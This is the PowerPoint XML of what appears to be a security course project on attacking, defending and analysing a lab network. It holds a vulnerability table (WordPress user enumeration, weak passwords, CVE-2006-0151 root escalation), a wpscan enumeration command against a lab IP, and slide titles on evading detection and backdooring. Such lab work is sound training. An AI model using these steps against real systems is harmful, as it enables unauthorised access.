                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F56F9F25-5C9C-4CA3-A914-FC497872E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3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E656ABC3-F068-4B85-8661-0EC5E9C89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535711AB-6053-4A1F-B963-9A991231C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99484A9E-C9E7-48E3-835C-CA00039A9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30E00243-C6C1-4AFB-9954-AC9C0837A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30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47B00545-0508-41CF-9169-37CB97E08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43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{884EDA62-CEFA-447C-A731-3A1FC949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1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C095E3E-AA61-45A1-B7D8-48F0E675A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52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E942C193-F3C5-4954-AD2C-EC2CD1AE7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53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDABF981-DD5E-4501-8BDA-03AA48E3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4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D003FB-F58B-4C20-87E7-6FB1422CC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55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D41B2545-F038-4CE0-B931-285F086D9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56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B64122A-3C88-4240-8766-D84EF1F12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57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE208694-203A-403C-AE2F-D2E289405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59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{212458A7-EAC6-4F24-80BD-77B41054B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60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{229A706A-FB43-4854-B0B0-7F0994577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61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{476F59BD-B421-4186-BBD7-39A00744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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D27B3750-2ECF-4CC9-B08C-9E5F55063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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{096E7AD1-BF5B-4298-9E32-A47CB010F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7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C2E7B82-DC9D-43AD-BA1E-3759FE4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8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCDC8C86-4A99-41A4-9DC0-08145CE0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9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8785DE7-3737-4E27-BE2F-0DBFD301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11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C28B40AF-5DD3-4A7F-91AB-F49D46E2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12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7411F1BC-34F9-470E-87B5-B3986C27F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13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AC0F0C8-6D0F-4644-9C89-D6EF4771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14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01D69BD9-5C87-44C7-9112-9A4D5F08D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16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67ECDACB-4E98-478E-959E-285DA9641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BAA10AA6-CC20-48EF-932E-6E1A686B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21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BE77E80-C10D-4958-BB7D-C901F940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25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4202FCC8-1E30-478E-BD2D-2531BE2D9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29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89277949-55D2-4CEB-BD97-066C2B1E3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B8EF2C08-9DA7-46E2-ADC8-1A2D271D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DD0041CF-27BC-41BA-AA0E-8D0BC8C51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33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A68EB76-B31F-4A68-A511-E9FA4DBAC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34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{810ECAA2-F5A4-4CCB-9E69-D7B7B340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35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFB1BDBB-BEE0-4E9D-9DA1-1050B31A2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36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93C7B171-B419-495C-8784-E5A33A26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37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54ED346F-C89B-431F-929F-F6044859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38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87138F5F-ADD8-43EA-8619-D8E063A4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39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92558A0E-070A-473C-A191-5F1F842E2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0">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC669C1C-F151-44FF-93F6-80E169BAE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1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7C8559F-5893-4FF6-A95F-5B6E188EF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6" name="Freeform 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{896641C3-B861-454E-A910-4A555C0EB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7" name="Freeform 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19F6709B-959B-414E-808B-32E9765C5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8" name="Freeform 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA9F93DC-C844-4B5E-AFC8-B2D0F1B5A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9" name="Freeform 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6126A395-7043-45D5-9BC7-F3920A874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0" name="Freeform 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B31760B7-7420-4FE1-A1D9-9252F344F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1" name="Freeform 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECCD080B-6241-42FB-BB45-9BAB64542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2" name="Freeform 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7130F0B8-37E5-4D73-B6D0-07AEF679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2283A536-3B42-4705-8BD6-F059FCE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4" name="Freeform 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0B7EC11-47EC-4CDE-BC72-A3777D6B7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42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23" y="131445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Critical Vulnerabilities: Target 1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DAAAC71-11A9-2340-A498-0820EF265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208326"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1098423" y="1100137"/>
          <a:ext cx="9634010" cy="5219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39352">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3798674658"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2806591">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3080859825"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3688067">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2446688474"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="600951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Vulnerability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Impact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443673"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1116052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Exposed WordPress Credentials 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Running a scan can enumerate usernames.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0"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Reveals user's login credentials.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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494280"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1373602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Weak Passwords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that have weak passwords can give access to malicious actors.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Lateral Movement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36965"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1373602"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CVE-2006-0151</a:t>
                      </a:r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 command is not cleared by the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PythonInspect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Environment Variable.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0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Privilege Escalation to root</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:effectLst/>
                      </a:endParaRP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117024"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="436405">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" rtl="0"/>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:effectLst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3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57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0443-DE12-3048-AFE1-24C5C1E0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097280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Target 1 Exploitation : Exposed User Credential's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A9E8388-ECC3-E644-B4C5-764A28F3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10" y="3985260"/>
            <a:ext cx="8805862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B6620D-A1D2-FC44-A88A-21C818047199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2014941" y="1672411"/>
            <a:ext cx="7772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Performing a Wpscan enumerates what user accounts are present on the server.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Having a list of users is impertinent to a cybercriminal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base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wpscan --url http://192.168.1.110/wordpress --wp-content-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  -ep -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>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2773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DarkSeedLeftStep">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="1B1D30"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F0F3F2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="C34D8B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="B13BAB"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="994DC3"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="553BB1"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="4D64C3"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="3B83B1"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="5C5EC8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2108</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>404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Avenir Next LT Pro</vt:lpstr>
      <vt:lpstr>Bradley Hand ITC</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Modern Love</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>BohemianVTI</vt:lpstr>
      <vt:lpstr>Final Engagement  Attack, Defense &amp; Analysis of a Vulnerable Network</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Offense - Table of Contents </vt:lpstr>
      <vt:lpstr> Network Topology  </vt:lpstr>
      <vt:lpstr> Network Topology &amp; Critical Vulnerabilities  </vt:lpstr>
      <vt:lpstr>Scan The Network &amp; Identify IP Addresses</vt:lpstr>
      <vt:lpstr> Reconnaissance and Exploitations of Target 1   </vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Target 1 Exploitation : Exposed User Credential's </vt:lpstr>
      <vt:lpstr>Target 1 Exploitation : Weak Passwords</vt:lpstr>
      <vt:lpstr>Target 1 – Flag 1 &amp;2</vt:lpstr>
      <vt:lpstr>Target 1 Exploitation : Weak Passwords (cont.)</vt:lpstr>
      <vt:lpstr>Target 1 Exploitation : CVE-2006-0151</vt:lpstr>
      <vt:lpstr>Target 1 – Flag 3 &amp;4</vt:lpstr>
      <vt:lpstr> Reconnaissance and Exploitations of Target 2  </vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 2</vt:lpstr>
      <vt:lpstr>Target 2 Exploitation : Directory Listing</vt:lpstr>
      <vt:lpstr>Target 2 Exploitation : Path Traversal Vulnerability</vt:lpstr>
      <vt:lpstr>Target 2 – Flag 1</vt:lpstr>
      <vt:lpstr>Target 2 Exploitation : CVE-2016-10033</vt:lpstr>
      <vt:lpstr>Target 2 – Flag 1</vt:lpstr>
      <vt:lpstr>Avoiding Detection</vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Weak Passwords </vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Exposed WordPress Credentials</vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Directory Traversal</vt:lpstr>
      <vt:lpstr>Maintaining Access</vt:lpstr>
      <vt:lpstr>Backdooring the Target</vt:lpstr>
      <vt:lpstr>Defense - Table of Contents </vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities </vt:lpstr>
      <vt:lpstr> Network Topology &amp; Critical Vulnerabilities  </vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 2</vt:lpstr>
      <vt:lpstr>Alerts Implemented </vt:lpstr>
      <vt:lpstr>Excessive HTTP Errors</vt:lpstr>
      <vt:lpstr>HTTP Request Size Monitor</vt:lpstr>
      <vt:lpstr>CPU Usage Monitor</vt:lpstr>
      <vt:lpstr>Hardening</vt:lpstr>
      <vt:lpstr>Target 1  Hardening Against Open Ports and Port Scanning</vt:lpstr>
      <vt:lpstr>Target 1  Hardening Against User Enumeration and Simple Passwords</vt:lpstr>
      <vt:lpstr>Target 1  Hardening Against Python Root Vulnerability </vt:lpstr>
      <vt:lpstr>Target 2  Hardening Against Unsecured/Open Ports</vt:lpstr>
      <vt:lpstr>Target 2  Hardening Against Directory Listing</vt:lpstr>
      <vt:lpstr>Target 2  Hardening Against Vulnerable Software</vt:lpstr>
      <vt:lpstr>Implementing Patches </vt:lpstr>
      <vt:lpstr>Implementing Patches with Ansible</vt:lpstr>
      <vt:lpstr>Network - Table of Contents </vt:lpstr>
      <vt:lpstr>Traffic Profile</vt:lpstr>
      <vt:lpstr>Traffic Profile</vt:lpstr>
      <vt:lpstr>Behavioral Analysis</vt:lpstr>
      <vt:lpstr>Normal Activity</vt:lpstr>
      <vt:lpstr>Streaming Video Analysis</vt:lpstr>
      <vt:lpstr>Searching for Record Information</vt:lpstr>
      <vt:lpstr>Malicious Activity</vt:lpstr>
      <vt:lpstr>ZLoader RAT Download</vt:lpstr>
      <vt:lpstr>NetSupport RAT Download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 Attack, Defense &amp; Analysis of a Vulnerable Network</dc:title>
  <dc:creator>Raven Chesnavage</dc:creator>
  <cp:lastModifiedBy>Raven Chesnavage</cp:lastModifiedBy>
  <cp:revision>43</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-01T06:01:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-03T01:40:34Z</dcterms:modified>
</cp:coreProperties>
</file>